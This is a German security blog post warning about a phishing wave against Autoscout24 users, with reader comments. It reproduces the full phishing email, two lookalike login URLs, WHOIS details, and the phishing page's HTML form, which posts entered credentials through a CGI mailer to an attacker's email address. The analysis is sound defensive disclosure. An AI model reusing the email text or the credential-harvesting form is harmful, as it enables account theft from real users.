Phishing Attacke gegen Autoscout24

Seite heute Morgen kurz nach 06:00 Uhr scheint eine gezielte phishing Attacke gegen autoscout24 im Gange zu sein. Das Phishing-Mail täuscht vor, vom Absender info@autoscout24.ch zu stammen. Der Absender ist in Wahrheit jedoch gefälscht:

Von: info@autoscout24.ch
Betreff: Verkaeufer Informationen Haben Erfordert

Aufmerksamkeit!

Liebes Mitglied Autoscout24,

Wir haben kurzlich bemerkt, dass eine oder mehr Versuche in zu Ihrem autoscout24 Konto von einem auslandischen IP Adresse loggen..

Wenn Sie kurzlich auf Ihr Konto zugegriffen haben, wahrend Reisen, durfte der ungewohnliche Klotz in Versuchen von Ihnen eingeleitet worden sein. Jedoch, wenn Sie den Klotz in nicht eingeleitet haben, bitte Besuch autoscout24 sobald moglich, Ihre Identitat zu beglaubigen:

http://autoscout24-reg.info/home/index/login.asp/verify.html

Beglaubigt, dass Ihre Identitat ein Sicherheitsma©¬ ist, das sichern wird, dass Sie die einzige Person mit Zugriff auf das Konto sind.

Dank fur Ihre Geduld, als wir zusammenarbeiten, Ihr Konto zu schutzen.

Fur mehr Informationen sieht bitte den Verbindungsblasebalg:

http://about.autoscout24.com/de-de/au-company/au-company-agb/au-company-agb-as24.aspx

Mit freundlichen Grussen,

AutoScout24 Team,
AutoScout24 GmbH
Rosenheimer Str. 143 b
81671 Munchen

Das Phishing-Mail ist in schlechtem deutsch verfasst und versucht den Empfänger auf eine Phishing-Seite zu locken:

autoscout24_phishing

Die Phishing Webseite autoscout24-reg.info (83.170.121.1) wird bei einem Provider in Grossbritannien gehostet:

inetnum: 83.170.120.0 – 83.170.123.255
netname: UK2-NET
descr: UK2.net
remarks: Abuse matters to: abuse@uk2.net
remarks: Abuse mail to any other address may be ignored
country: GB

Gibt das Opfer seine Autoscout24 Login Informationen ein, werde diese an den Urheber der Phishing-Mails gesendet. Interessant ist in diesem Fall der HTML-Quellcode der Phishing-Webseite, dort findet man nämlich die E-Mail Adresse, an welche die gephishten Login Informationen gehen:

<\FORM style="MARGIN: 0px" name=SignInForm
onsubmit=setOptimCookie();readFlash();
action=http://www.step-sa.fr/cgi-bin/mailform.cgi method=post
?><\INPUT type=hidden value=username,password,email,email_p
name=data_order> <\INPUT type=hidden
value=fameia_bionica@yahoo.com name=submit_to> <\INPUT type=hidden
value=http://magazin.autoscout24.de/container/container-2/cookies_ab_ie6.asp
name=ok_url>

Mit einem Klick auf den Button “Anmelden” werden die angegebenen Login-Daten über ein CGI-Script auf www.step-sa.fr per E-Mail an eine Yahoo E-Mail Adresse gesandt:

fameia_bionica@yahoo.com

Fazit
Den Empfänger solcher Phishing-Mails wird dringen davon abgeraten, auf den im Phishing-Mail angegebenen Link zu klicken sowie auf keinen Fall seine Login-Daten bekannt zu geben.

UPDATE 19. März 2009

Seit heute Morgen ist erneut eine Phishing-Welle gegen Autoscout24 am rollen. Absender, E-Mail Betreff und E-Mail Text sind die selben wie bei der letzte Phishing-Welle. Die angepriesene URL ist jedoch eine andere (autoscot24-ch.info):

http://autoscot24-ch.info/home/index/login.asp/verify.html

Die Webseite wird diesmal auf einem Server in den USA betrieben:

Domain: autoscot24-ch.info
IP address: 216.10.249.21

NetRange: 216.10.240.0 – 216.10.255.255
OrgName: Webhost4life.com
OrgID: UMA-9
Address: 1055 Corporate Center Drive Suite 210
City: Monterey Park
StateProv: CA
PostalCode: 91754
Country: US

5 Responses to “Phishing Attacke gegen Autoscout24”


  • Es stellt sich mir die Frage, was dem Urheber die Login Informationen bei Autoscout bringen. Verkauft er ein Auto in meinem Namen? Wohl kaum. Kommt er so an persönliche Daten von mir ran? Schon, aber Kreditkartennummern werden nicht angezeigt. Braucht er das Konto, um zu spammen? Falls jemand was weiss, das würde mich interessieren.

  • Leider ist es ja immer noch viele Leute, die bei allen Accounts das gleiche Passwort benutzen. Ich wette, mit den bei autoscout ergatterten Passwörtern können einige Accounts beispielsweise bei Paypal geknackt werden. Sicherlich nur wenige, aber Kleinvieh macht auch Mist.

  • Nebst PayPal benutzen auch andere Serviceanbieter die persönliche Mail-Adresse mit Passwort als Account (kostenpflichtige Räume, pers. Datenhorts wie Skydrive, digitale Server usw.) Würde mich nicht wundern, wenn so Dienstleistungen fremdgenutzt oder sogar aktiviert werden und den Phishingopfern später Rechnungen ins Haus flattern. Daneben wird dem Hacker auf diesem Weg die pers. Mailbox geöffnet, worin er sicherlich interessante Daten finden kann, die ihn weiterbringen.

  • Hallo Joanna,

    es werden tatsächlich Autoverkäufe inseriert. Üblicherweise handelt es sich dabei um günstige Sportwagen, welche aus einem Erbfall stammen und meist in London stehen sollen. Der Käufer soll meist per WesternUnion für den Kauf und Versand zahlen, das Auto kommt jedoch nie an. ZDF WISO hat vor einiger Zeit mal einen Beitrag über diese Masche gebracht (siehe ZDF Mediathek).

  • Habe immer noch Tränen in den Augen vor Lachen! “Verbindungsblasebalg” ist ab sofort mein neues Lieblingswort!

Leave a Reply




economics-recluse
Scene
Urgent!